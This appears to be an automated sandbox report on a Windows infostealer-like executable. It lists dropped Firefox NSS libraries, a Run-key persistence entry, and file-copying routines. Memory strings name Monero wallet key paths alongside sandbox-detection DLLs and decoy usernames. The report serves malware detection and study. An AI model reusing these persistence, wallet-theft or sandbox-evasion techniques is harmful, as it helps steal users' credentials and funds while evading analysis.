Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File created: C:\Users\user\Music\AttoDesignerUpdater
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File created: C:\Users\user\AppData\Local\Temp\delays.tmp
Source: 7ZthFNAqYp.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125180358.00000000011D4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3102837907.00000000011AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: 7ZthFNAqYp.exe ReversingLabs: Detection: 44%
Source: 7ZthFNAqYp.exe Virustotal: Detection: 44%
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File read: C:\Users\user\Desktop\7ZthFNAqYp.exe
Source: unknown Process created: C:\Users\user\Desktop\7ZthFNAqYp.exe "C:\Users\user\Desktop\7ZthFNAqYp.exe"
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Process created: C:\Users\user\Desktop\7ZthFNAqYp.exe "C:\Users\user\Desktop\7ZthFNAqYp.exe"
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: oledlg.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: k7rn7l32.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: ntd3ll.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: dbghelp.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: sxs.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: 7ZthFNAqYp.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 7ZthFNAqYp.exe Static file information: File size 5233152 > 1048576
Source: 7ZthFNAqYp.exe Static PE information: section name: RT_CURSOR
Source: 7ZthFNAqYp.exe Static PE information: section name: RT_BITMAP
Source: 7ZthFNAqYp.exe Static PE information: section name: RT_ICON
Source: 7ZthFNAqYp.exe Static PE information: section name: RT_MENU
Source: 7ZthFNAqYp.exe Static PE information: section name: RT_DIALOG
Source: 7ZthFNAqYp.exe Static PE information: section name: RT_STRING
Source: 7ZthFNAqYp.exe Static PE information: section name: RT_ACCELERATOR
Source: 7ZthFNAqYp.exe Static PE information: section name: RT_GROUP_ICON
Source: 7ZthFNAqYp.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x25c800
Source: 7ZthFNAqYp.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x214200
Source: 7ZthFNAqYp.exe Static PE information: More than 200 imports for USER32.dll
Source: 7ZthFNAqYp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: freebl3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source: Binary string: freebl3.pdbp source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source: Binary string: nss3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: softokn3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3410535288.0000000038547000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3406548089.000000002C66D000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
Source: Binary string: nss3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: mozglue.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp
Source: Binary string: softokn3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\dev\sw\hbautil\source\windows\bench32\Release\Bench32.exe.pdb source: 7ZthFNAqYp.exe, AttoConvertVideo.exe.0.dr

Data Obfuscation

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Unpacked PE file: 2.2.7ZthFNAqYp.exe.20020000.4.unpack
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00938ADE GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00938ADE
Source: 7ZthFNAqYp.exe Static PE information: real checksum: 0x4238d5 should be: 0x506581
Source: freebl3.dll.2.dr Static PE information: section name: .00cfg
Source: mozglue.dll.2.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.2.dr Static PE information: section name: .didat
Source: softokn3.dll.2.dr Static PE information: section name: .00cfg
Source: nss3.dll.2.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0094F2D2 push ecx; ret 2_2_0094F2E5
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0094CE9A push ecx; retf 2_2_0094CE9B
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00942EC9 push esi; ret 2_2_00942ECB
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00952715 push 0000004Ch; iretd 2_2_00952726
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0093DF45 push ecx; ret 2_2_0093DF58
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File created: C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AttoDesignerEditor
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: 0.2.7ZthFNAqYp.exe.27e0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.7ZthFNAqYp.exe.833b9e.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.7ZthFNAqYp.exe.920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.7ZthFNAqYp.exe.920000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.7ZthFNAqYp.exe.833b9e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.7ZthFNAqYp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR
Source: 7ZthFNAqYp.exe Binary or memory string: DIR_WATCH.DLL
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: 7ZthFNAqYp.exe Binary or memory string: SBIEDLL.DLL
Source: 7ZthFNAqYp.exe Binary or memory string: API_LOG.DLL
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos, 2_2_0092180D
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Dropped PE file which has not been started: C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe API coverage: 6.5 %
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00930DB0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00930EC3h 2_2_00930DB0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00936013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00936013
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00929CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00929CF1
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0093547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_0093547D
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0092D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_0092D59B
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00921D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00921D80
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0092B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_0092B5B4
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00934D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, 2_2_00934D08
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0092BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 2_2_0092BF22
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0092B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_0092B914
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00935B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 2_2_00935B4D
